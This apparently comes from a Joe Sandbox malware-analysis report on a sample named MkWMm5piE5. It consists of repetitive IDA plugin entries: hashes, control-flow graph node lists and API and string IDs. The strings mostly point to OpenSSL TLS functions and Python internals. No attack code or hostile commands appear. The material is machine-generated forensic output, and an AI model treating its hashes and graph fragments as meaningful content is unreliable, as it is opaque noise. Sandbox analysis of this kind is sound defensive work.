                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Dealloc$Unicode_$FromInternPlaceSizeString
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2745024575-0
                                                                                                                                                                                                                                                                          • Opcode ID: 091893d1f0e79c71c802a693a5176002506af28f025ec817263c4d69333cf0a2
                                                                                                                                                                                                                                                                          • Instruction ID: 4eacbb066979a84a64b06e7bf6c2b916fd32056238ccca9b79f28832aa4e572b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 091893d1f0e79c71c802a693a5176002506af28f025ec817263c4d69333cf0a2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A719639E09A0285FA759F65A95413C33A4AF48B9CF5C8937C90D82E71FEAFA441C750

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 604 7ffedce8f2d0-7ffedce8f2fc call 7ffedce3132a 607 7ffedce8f30c-7ffedce8f35c 604->607 608 7ffedce8f2fe-7ffedce8f305 604->608 609 7ffedce8f360-7ffedce8f365 607->609 608->607 610 7ffedce8f36b-7ffedce8f36e 609->610 611 7ffedce8f574-7ffedce8f577 609->611 612 7ffedce8f3aa-7ffedce8f3b9 610->612 613 7ffedce8f370-7ffedce8f373 610->613 614 7ffedce8f579-7ffedce8f58b 611->614 615 7ffedce8f594-7ffedce8f59d 611->615 632 7ffedce8f3bb-7ffedce8f3c5 612->632 633 7ffedce8f3d1-7ffedce8f3ee 612->633 616 7ffedce8f379-7ffedce8f37c 613->616 617 7ffedce8f4cb-7ffedce8f4da 613->617 618 7ffedce8f58d 614->618 619 7ffedce8f592 614->619 626 7ffedce8f5a3-7ffedce8f5a6 615->626 627 7ffedce8f665-7ffedce8f669 615->627 621 7ffedce8f382-7ffedce8f3a5 ERR_new ERR_set_debug 616->621 622 7ffedce8f545-7ffedce8f54b call 7ffedce90cd2 616->622 623 7ffedce8f4ea-7ffedce8f4f0 617->623 624 7ffedce8f4dc-7ffedce8f4e0 617->624 618->619 619->615 628 7ffedce8f694-7ffedce8f69e call 7ffedce31d93 621->628 640 7ffedce8f54d-7ffedce8f553 622->640 630 7ffedce8f50a-7ffedce8f521 623->630 631 7ffedce8f4f2-7ffedce8f4f5 623->631 624->623 629 7ffedce8f4e2-7ffedce8f4e5 call 7ffedce31cfd 624->629 636 7ffedce8f5b8-7ffedce8f5c6 626->636 637 7ffedce8f5a8-7ffedce8f5ab 626->637 638 7ffedce8f66b-7ffedce8f66f 627->638 639 7ffedce8f671-7ffedce8f676 ERR_new 627->639 648 7ffedce8f6a3 628->648 629->623 634 7ffedce8f52a call 7ffedce31523 630->634 635 7ffedce8f523-7ffedce8f528 call 7ffedce31299 630->635 631->630 643 7ffedce8f4f7-7ffedce8f508 631->643 632->633 633->648 651 7ffedce8f3f4-7ffedce8f3fc 633->651 653 7ffedce8f52f-7ffedce8f531 634->653 635->653 636->609 637->609 647 7ffedce8f5b1-7ffedce8f5b3 637->647 638->639 638->648 649 7ffedce8f67b-7ffedce8f68e ERR_set_debug 639->649 640->609 650 7ffedce8f559-7ffedce8f563 640->650 643->653 654 7ffedce8f6a5-7ffedce8f6bd 647->654 648->654 649->628 650->611 656 7ffedce8f3fe-7ffedce8f40c 651->656 657 7ffedce8f411-7ffedce8f424 call 7ffedce3138e 651->657 653->648 658 7ffedce8f537-7ffedce8f53e 653->658 656->609 661 7ffedce8f42a-7ffedce8f44b 657->661 662 7ffedce8f64c-7ffedce8f65b call 7ffedce31b9a ERR_new 657->662 658->622 661->662 666 7ffedce8f451-7ffedce8f45c 661->666 662->627 667 7ffedce8f45e-7ffedce8f46a 666->667 668 7ffedce8f492-7ffedce8f4b3 666->668 673 7ffedce8f5ea-7ffedce8f5f8 call 7ffedce31b9a 667->673 674 7ffedce8f470-7ffedce8f473 667->674 671 7ffedce8f4b9-7ffedce8f4c5 call 7ffedce31145 668->671 672 7ffedce8f633-7ffedce8f642 call 7ffedce31b9a ERR_new 668->672 671->617 671->672 672->662 684 7ffedce8f5fa-7ffedce8f5fe 673->684 685 7ffedce8f604-7ffedce8f60e ERR_new 673->685 674->668 677 7ffedce8f475-7ffedce8f48d call 7ffedce31b9a 674->677 677->609 684->648 684->685 685->649
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596683141.00007FFEDCE31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCE30000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596666996.00007FFEDCE30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596683141.00007FFEDCEB3000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596766588.00007FFEDCEDD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE8000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedce30000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: R_newR_set_debug
                                                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem.c$write_state_machine
                                                                                                                                                                                                                                                                          • API String ID: 193678381-552286378
                                                                                                                                                                                                                                                                          • Opcode ID: a5f4632925a88d6e1ca748f764557a43c4085ecb0ae228e16c9fe84a45c8d4bf
                                                                                                                                                                                                                                                                          • Instruction ID: 4a2217a6d63441b8dd317d15360e1c505a067fb39d8dce4bbc18dc096049d702
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5f4632925a88d6e1ca748f764557a43c4085ecb0ae228e16c9fe84a45c8d4bf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7A16EA2A4854285EB649F29D8542BD7360FF80BC8F484137ED0D9BAB9DE3DE947C740

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 687 7ffedcea1360-7ffedcea1390 call 7ffedce3132a 690 7ffedcea1394-7ffedcea139e 687->690 691 7ffedcea1409-7ffedcea140d 690->691 692 7ffedcea13a0-7ffedcea13ca 690->692 693 7ffedcea1563-7ffedcea157f call 7ffedce326df 691->693 694 7ffedcea1413-7ffedcea1417 691->694 695 7ffedcea13d3-7ffedcea13d5 692->695 706 7ffedcea1581-7ffedcea15a2 call 7ffedce31e4c 693->706 707 7ffedcea15a4-7ffedcea15d3 693->707 694->693 696 7ffedcea141d-7ffedcea1420 694->696 698 7ffedcea13db-7ffedcea13e2 695->698 699 7ffedcea1555 695->699 696->693 700 7ffedcea1426-7ffedcea142a 696->700 702 7ffedcea13e8-7ffedcea13eb 698->702 703 7ffedcea14bd-7ffedcea14c4 698->703 705 7ffedcea155c-7ffedcea155e 699->705 700->693 704 7ffedcea1430-7ffedcea1434 700->704 711 7ffedcea1486-7ffedcea14b8 ERR_new ERR_set_debug call 7ffedce31d93 702->711 712 7ffedcea13f1-7ffedcea1407 702->712 709 7ffedcea14c6-7ffedcea14cc 703->709 710 7ffedcea151e-7ffedcea1550 ERR_new ERR_set_debug call 7ffedce31d93 703->710 704->693 714 7ffedcea143a-7ffedcea143e 704->714 715 7ffedcea15ea-7ffedcea15fc 705->715 713 7ffedcea15d7-7ffedcea15de 706->713 707->713 709->710 717 7ffedcea14ce-7ffedcea14d1 709->717 710->715 711->715 712->691 712->692 718 7ffedcea15e5 713->718 714->693 720 7ffedcea1444-7ffedcea1455 714->720 717->710 723 7ffedcea14d3-7ffedcea14d7 717->723 718->715 720->690 725 7ffedcea145b-7ffedcea1481 720->725 726 7ffedcea14d9-7ffedcea14e3 723->726 727 7ffedcea14e5-7ffedcea1519 723->727 725->690 726->705 726->727 727->718
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596683141.00007FFEDCE31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCE30000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596666996.00007FFEDCE30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596683141.00007FFEDCEB3000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596766588.00007FFEDCEDD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE8000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedce30000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: R_newR_set_debug
                                                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_lib.c$tls_get_message_header
                                                                                                                                                                                                                                                                          • API String ID: 193678381-2714770296
                                                                                                                                                                                                                                                                          • Opcode ID: 44339be371f19ce60e16decc70b2f8c43b187620bc47edc7815a2de6d2c06910
                                                                                                                                                                                                                                                                          • Instruction ID: a5644e8d393ab6131b5a4de4e7016d9146bdb47c2e805a74fcc0b220cc8a9927
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44339be371f19ce60e16decc70b2f8c43b187620bc47edc7815a2de6d2c06910
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 766130B26486818AEB90CF29D8503BD37A4EB44B88F0C5036DE8DD7AA5DF39E456C710

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596683141.00007FFEDCE31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCE30000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596666996.00007FFEDCE30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596683141.00007FFEDCEB3000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596766588.00007FFEDCEDD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE8000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedce30000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: C_get_current_jobR_newR_set_debugR_set_error
                                                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c$SSL_do_handshake
                                                                                                                                                                                                                                                                          • API String ID: 2134390360-2964568172
                                                                                                                                                                                                                                                                          • Opcode ID: 46602194f778fa2614cb91244c54d281bde36e84fac3cc3955deca6444a68e60
                                                                                                                                                                                                                                                                          • Instruction ID: 3bb8ea25549d39ee56056b11d819c493699c64d3151aba18d73cff7fe0b113da
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 46602194f778fa2614cb91244c54d281bde36e84fac3cc3955deca6444a68e60
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7121B5A2B5874286EA50EB29E9012FD2351EF897C4F5C1132EE4D67FA6DE3CE5538600

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Dealloc
                                                                                                                                                                                                                                                                          • String ID: <module>
                                                                                                                                                                                                                                                                          • API String ID: 3617616757-217463007
                                                                                                                                                                                                                                                                          • Opcode ID: 3d0b5fe31bdceefd0d16471987016516823057e139ed2a49c540c935358a7bd8
                                                                                                                                                                                                                                                                          • Instruction ID: 8e0fb3631882f2993cb005ec0f29fe2f31fedb7a2fffd764822088d1ac7d8c32
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d0b5fe31bdceefd0d16471987016516823057e139ed2a49c540c935358a7bd8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69F03A65E0A90381FA399B89A8104BC2350AF4079CF8C8437D90D83AB0FEBEA5418700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596683141.00007FFEDCE31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCE30000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596666996.00007FFEDCE30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596683141.00007FFEDCEB3000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596766588.00007FFEDCEDD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE8000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedce30000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: R_new$R_set_debugX_new$X_free
                                                                                                                                                                                                                                                                          • String ID: ..\s\ssl\t1_enc.c$HMAC$tls-mac-size$tls-version$tls1_change_cipher_state$tls_provider_set_tls_params
                                                                                                                                                                                                                                                                          • API String ID: 1274617517-1172825828
                                                                                                                                                                                                                                                                          • Opcode ID: 839be93284c88dcf57b7fbe23490238339b188a9a097ddaf280320309f04adf0
                                                                                                                                                                                                                                                                          • Instruction ID: 6a61479572ad3bc034a2a9096c8d554106dfed070c6e7dba47b447c5dd9ad098
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 839be93284c88dcf57b7fbe23490238339b188a9a097ddaf280320309f04adf0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8422C2A2A98B8285EA259B19D8417BD23A0FF447C4F485532EE4DA7FB1DF3DE1538700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596683141.00007FFEDCE31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCE30000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596666996.00007FFEDCE30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596683141.00007FFEDCEB3000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596766588.00007FFEDCEDD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE8000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedce30000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: L_sk_new_nullL_sk_pop_freeR_newR_set_debugX509X509_freeX509_new_exd2i_
                                                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_srvr.c$tls_process_client_certificate
                                                                                                                                                                                                                                                                          • API String ID: 3085087540-2403068147
                                                                                                                                                                                                                                                                          • Opcode ID: e7ac40234c7871e943591a6a16c750c8c5aad5c36b49f4b19cb9dfd3ea198fc0
                                                                                                                                                                                                                                                                          • Instruction ID: 816a4aa63f79e23a27a0ac3a887514863c1718bca6195987536ce8373c1c341b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7ac40234c7871e943591a6a16c750c8c5aad5c36b49f4b19cb9dfd3ea198fc0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38129BB2B4869289EB14DB29DC506FD2760AB45BC4F4C6037DD4DA7EA6DE3DE182C300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596683141.00007FFEDCE31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCE30000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596666996.00007FFEDCE30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596683141.00007FFEDCEB3000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596766588.00007FFEDCEDD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE8000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedce30000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: R_newR_set_debug$D_get_sizeX_get0_md
                                                                                                                                                                                                                                                                          • String ID: ..\s\ssl\record\ssl3_record.c$dtls1_process_record
                                                                                                                                                                                                                                                                          • API String ID: 1548276727-2476007939
                                                                                                                                                                                                                                                                          • Opcode ID: 8231b5244ebe626bd6c7b0d5ae1d282ea8e43ca2ff818b6f569e9de5bc52912f
                                                                                                                                                                                                                                                                          • Instruction ID: 189d7251a9e878b0832a3173c0ddda0ebec406221b5d7167baaacdbd2707aa5f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8231b5244ebe626bd6c7b0d5ae1d282ea8e43ca2ff818b6f569e9de5bc52912f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98B17DB1A59A4295EB50AB29ED006FD23A4FF84BC4F485033DE0DA7EA5DE3DE5538300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596683141.00007FFEDCE31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCE30000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596666996.00007FFEDCE30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596683141.00007FFEDCEB3000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596766588.00007FFEDCEDD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE8000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedce30000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: R_newR_set_debug$X_freeX_new
                                                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_lib.c$tls13_save_handshake_digest_for_pha$tls_process_finished
                                                                                                                                                                                                                                                                          • API String ID: 1676177304-1286925996
                                                                                                                                                                                                                                                                          • Opcode ID: 6a4a892bc5ab0c5874d1cf4f2fc3f67a63173063c2b20da1bf408fa39b78dba4
                                                                                                                                                                                                                                                                          • Instruction ID: 482919478ec810a104930f243585fdf2e2e31ee1a60323679ab20fcffb5beddb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a4a892bc5ab0c5874d1cf4f2fc3f67a63173063c2b20da1bf408fa39b78dba4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0A15CA1A886428AFB529B29DC506FD2650EF44BC4F4C6037DE0DA7EB5DE3AE543C350
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596683141.00007FFEDCE31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCE30000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596666996.00007FFEDCE30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596683141.00007FFEDCEB3000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596766588.00007FFEDCEDD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE8000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedce30000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: O_mallocR_newR_set_debug$O_clear_freeO_freeX_freeX_new_from_pkeyY_encapsulate
                                                                                                                                                                                                                                                                          • String ID: ..\s\ssl\s3_lib.c$ssl_encapsulate
                                                                                                                                                                                                                                                                          • API String ID: 1298386825-1554727935
                                                                                                                                                                                                                                                                          • Opcode ID: 0250e886b169c895fdbaa09591ffe73ad0cfe0cff552d0883af208d6ff8bf5d0
                                                                                                                                                                                                                                                                          • Instruction ID: 067ce4bd2079d1a71e54031694c931a966f35059d83bb6de3924178852cc6f20
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0250e886b169c895fdbaa09591ffe73ad0cfe0cff552d0883af208d6ff8bf5d0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A51C0A1A59A4295FA10AB6EAC015BDA391AF85BC0F585037FE4C67FB5DE3CE1038700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596683141.00007FFEDCE31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCE30000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596666996.00007FFEDCE30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596683141.00007FFEDCEB3000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596766588.00007FFEDCEDD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE8000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedce30000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: R_newR_set_debug$O_clear_freeO_mallocX_freeX_new_from_pkey
                                                                                                                                                                                                                                                                          • String ID: ..\s\ssl\s3_lib.c$ssl_decapsulate
                                                                                                                                                                                                                                                                          • API String ID: 263585440-1707435976
                                                                                                                                                                                                                                                                          • Opcode ID: ed7332e58c8f94780757839a09b4be28771bcd13a0668ce124020a86e36837ba
